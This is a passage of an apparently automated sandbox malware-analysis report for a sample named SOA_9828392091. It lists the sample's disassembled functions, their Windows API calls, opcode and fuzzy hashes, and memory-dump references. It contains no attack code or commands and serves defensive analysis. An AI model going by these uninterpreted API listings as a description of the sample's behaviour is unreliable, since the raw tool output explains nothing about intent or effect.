                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                      • String ID:
                                      • API String ID: 1687444384-0
                                      • Opcode ID: 4adb2ec9a3cc0b769ee1f035fb9798d5be5ab2ed37099c76e674bcdc841f6dc2
                                      • Instruction ID: 17046e0c6a04e1131a36c82af0f11695f8db78a7a471c99d83258ad1cee0b14f
                                      • Opcode Fuzzy Hash: 4adb2ec9a3cc0b769ee1f035fb9798d5be5ab2ed37099c76e674bcdc841f6dc2
                                      • Instruction Fuzzy Hash: CD016171405700DFD721DFB6D905749F7F0AF90326F20494EE89A972A0CB70A648CB11
                                      Function 0099E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0099E33D
                                      • _memset.LIBCMT ref: 0099E34C
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009F3D00,009F3D44), ref: 0099E37B
                                      • CloseHandle.KERNEL32 ref: 0099E38D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3277943733-0
                                      • Opcode ID: 140bf9e7fa462b06042314f96df712f04de833fb967dd17b0dcf176209da0b4e
                                      • Instruction ID: aed58c385f8a33b2a07b694ca36425f53b910d7dfca8386d46c82538d6203f7a
                                      • Opcode Fuzzy Hash: 140bf9e7fa462b06042314f96df712f04de833fb967dd17b0dcf176209da0b4e
                                      • Instruction Fuzzy Hash: 6BF05EF1564304BAE3105B65EC46F777EACDB04B55F008421BF08D61E2D3799E00E7A8
                                      Function 0099EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0094AFE3
                                        • Part of subcall function 0094AF83: SelectObject.GDI32(?,00000000), ref: 0094AFF2
                                        • Part of subcall function 0094AF83: BeginPath.GDI32(?), ref: 0094B009
                                        • Part of subcall function 0094AF83: SelectObject.GDI32(?,00000000), ref: 0094B033
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0099EA8E
                                      • LineTo.GDI32(00000000,?,?), ref: 0099EA9B
                                      • EndPath.GDI32(00000000), ref: 0099EAAB
                                      • StrokePath.GDI32(00000000), ref: 0099EAB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: 957abd70242b83178aa10c1e5be2199d6d5afd0e5a3597719e61bd05826c12bd
                                      • Instruction ID: 68a4eca79c037af879b15191d5e51466de0790b2e3d215447dfcb54a65bf9496
                                      • Opcode Fuzzy Hash: 957abd70242b83178aa10c1e5be2199d6d5afd0e5a3597719e61bd05826c12bd
                                      • Instruction Fuzzy Hash: F9F0823105A25ABBDB12AF98AE0DFCE3F19AF16321F084201FE11610F187755551EBD9
                                      Function 0096C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0096C84A
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0096C85D
                                      • GetCurrentThreadId.KERNEL32 ref: 0096C864
                                      • AttachThreadInput.USER32(00000000), ref: 0096C86B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: 28367e0e67f9cc480a1dd007a84d01d5e5c54bd9033b06c57cbf457cf3458149
                                      • Instruction ID: bb0951bc353091955242e96e7929fe9f6717168744aa19b99f652fdf6447a41a
                                      • Opcode Fuzzy Hash: 28367e0e67f9cc480a1dd007a84d01d5e5c54bd9033b06c57cbf457cf3458149
                                      • Instruction Fuzzy Hash: D7E065B1146228B6DB205B61DD0DEDB7F1CEF057B1F408115B50D95450D671C580DBE0
                                      Function 0096B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 0096B0D6
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,0096AC9D), ref: 0096B0DD
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0096AC9D), ref: 0096B0EA
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,0096AC9D), ref: 0096B0F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: a3245fdd8c5ca72e1bb09beb059c3407aa5d86f0666df2e989512ff7bd263c40
                                      • Instruction ID: 81e9f2ce89edfda47de14268faa09c63ef369a0413ab8b759eb30e81d7331551
                                      • Opcode Fuzzy Hash: a3245fdd8c5ca72e1bb09beb059c3407aa5d86f0666df2e989512ff7bd263c40
                                      • Instruction Fuzzy Hash: 85E086366562129BD7202FB15E0CB473BACEF557B5F018928F741D6040FB348441DB60
                                      Function 0094B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0094B496
                                      • SetTextColor.GDI32(?,000000FF), ref: 0094B4A0
                                      • SetBkMode.GDI32(?,00000001), ref: 0094B4B5
                                      • GetStockObject.GDI32(00000005), ref: 0094B4BD
                                      • GetWindowDC.USER32(?,00000000), ref: 009ADE2B
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 009ADE38
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 009ADE51
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 009ADE6A
                                      • GetPixel.GDI32(00000000,?,?), ref: 009ADE8A
                                      • ReleaseDC.USER32(?,00000000), ref: 009ADE95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: 28ca1d5cd955cf56173f599aeeece579f954fb3745d4447bdca2372b231fc841
                                      • Instruction ID: 7f2214f1ce124eac20fe9c9345e49694e53539db5e5a8440a63ee6261f8542f9
                                      • Opcode Fuzzy Hash: 28ca1d5cd955cf56173f599aeeece579f954fb3745d4447bdca2372b231fc841
                                      • Instruction Fuzzy Hash: 75E06D31119240AAEB251B68AC09BD83B15AB1233AF10C326F66A980E1D7B18580EB11
                                      Function 009AB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 6d649b43dc68b588f2770b17f8ffa1162d040ee5c331e3ebcb60246937d1b5c5
                                      • Instruction ID: 6f8ddfd993af751cb3322fff456f1f353bf93a8dd2b71959308cbdbf5991b8a9
                                      • Opcode Fuzzy Hash: 6d649b43dc68b588f2770b17f8ffa1162d040ee5c331e3ebcb60246937d1b5c5
                                      • Instruction Fuzzy Hash: 00E04FB5515204EFDB005F70C948A6D7BA4FB4C361F11C916FC5A87311EB789840AB50
                                      Function 009AB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 27cd7bd5ad84dfea0fcac9dc4bffaa1a9c9a149dbf4ddbd667424314c384a67c
                                      • Instruction ID: 92a16225f86019e4326a2809af428d634890a000acc7e9fe1b0db6059821cd52
                                      • Opcode Fuzzy Hash: 27cd7bd5ad84dfea0fcac9dc4bffaa1a9c9a149dbf4ddbd667424314c384a67c
                                      • Instruction Fuzzy Hash: E8E046B9915200EFDB005F70C988A2D7BA8FB4C361F118A1AFD5A8B310EB789800AB50
                                      Function 0096DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0096DEAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 3565006973-3941886329
                                      • Opcode ID: 9d4aa3af933c45991cda28836f0f93caf17cb9fd4ce98e5751e61e738dbffeea
                                      • Instruction ID: 3ffd228925cb30e43b8a8c24d6026e72c33c6426ae24e6e8b879d264f3d4b57a
                                      • Opcode Fuzzy Hash: 9d4aa3af933c45991cda28836f0f93caf17cb9fd4ce98e5751e61e738dbffeea
                                      • Instruction Fuzzy Hash: 80914774A01701AFDB24DF64C894B6AB7F9BF88710F20886DF95ACB691DB71E841CB50
                                      Function 0094BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 0094BCDA
                                      • GlobalMemoryStatusEx.KERNEL32 ref: 0094BCF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: e4653c450ae09c89bb6c671b2b112d0f7e76f259debf18d9150471b44c148b25
                                      • Instruction ID: b1eea6a9de4cbf4938c0150b1bda5cebc9ada0ee9d0b3d4432c5dcdcd8a8ae40
                                      • Opcode Fuzzy Hash: e4653c450ae09c89bb6c671b2b112d0f7e76f259debf18d9150471b44c148b25
                                      • Instruction Fuzzy Hash: D6512871418748ABE320AF14D885FAFBBECFBD4354F81485EF1C8450A6DB7089A89766
                                      Function 0097C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 009344ED: __fread_nolock.LIBCMT ref: 0093450B
                                      • _wcscmp.LIBCMT ref: 0097C65D
                                      • _wcscmp.LIBCMT ref: 0097C670
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscmp$__fread_nolock
                                      • String ID: FILE
                                      • API String ID: 4029003684-3121273764
                                      • Opcode ID: 0631f224e3b6263d1578cb098ab04677b19ec524ad78a834e2102372bd2a2e6c
                                      • Instruction ID: ccf149ec91eefd0e13a376317a41dd5a32ad34a686b60d14eda24caa79c9051a
                                      • Opcode Fuzzy Hash: 0631f224e3b6263d1578cb098ab04677b19ec524ad78a834e2102372bd2a2e6c
                                      • Instruction Fuzzy Hash: 0641D572A0020ABBDF20ABA4DC85FEF77B9AF89714F014479F605EB191D671AA048B51
                                      Function 0099A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0099A85A
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0099A86F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: ea2b30f5d40af33b6640332129723b7914d1887c00036be53da75034bcd55aed
                                      • Instruction ID: 0c8ddb9ec38a19189e6c383a6c51c3d8b59f27d88d27a32c9a9d9a5bfe9d2daa
                                      • Opcode Fuzzy Hash: ea2b30f5d40af33b6640332129723b7914d1887c00036be53da75034bcd55aed
                                      • Instruction Fuzzy Hash: 0941E774E012099FDF14CFA9D881BEA7BB9FB08314F14016AE905EB351D770A941CFA1
                                      Function 00985180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00985190
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009851C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CrackInternet_memset
                                      • String ID: |
                                      • API String ID: 1413715105-2343686810
                                      • Opcode ID: a4491e04aecb5d36da182fe74ce42f2e3881eeed0ff15f17ef0316ac6825a9e2
                                      • Instruction ID: 8ea65e7b32c04414cf566237e63c3aecb326da3a1329d78a12ef0749875fb550
                                      • Opcode Fuzzy Hash: a4491e04aecb5d36da182fe74ce42f2e3881eeed0ff15f17ef0316ac6825a9e2
                                      • Instruction Fuzzy Hash: C031F871800119ABCF11EFA4CC85AEEBFB9FF58710F100015E815B6266EA31A95ADFA0
                                      Function 0099975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 0099980E
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0099984A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: bdf1d0ce920ac9a86c02d823e1ff1bb1475a21ffbf3830abb6ac405358e740f6
                                      • Instruction ID: b8fc30ae1e8a6df2800817671a9daea3cc85b7761b7442b1a9f927cc9e147f36
                                      • Opcode Fuzzy Hash: bdf1d0ce920ac9a86c02d823e1ff1bb1475a21ffbf3830abb6ac405358e740f6
                                      • Instruction Fuzzy Hash: 01315871110604AAEF209F79CC81BBB77ADFF99764F10861DF9A9C7190DA31AC81DB60
                                      Function 00975157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 009751C6
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00975201
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: b94e08eed4e99acc7e673ead219a0ea5a3ccc1fee76aa9f47874f46aa2762250
                                      • Instruction ID: b2d4352bdfc7c68240e20a54865db1dd919ee3e4651cf6fa0882af8fc215d9d0
                                      • Opcode Fuzzy Hash: b94e08eed4e99acc7e673ead219a0ea5a3ccc1fee76aa9f47874f46aa2762250
                                      • Instruction Fuzzy Hash: 4E312873600304DBEBA4CF99D845BAEBBFCFF85350F158019E9A9A61A1D7F09944CB50
                                      Function 0098658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
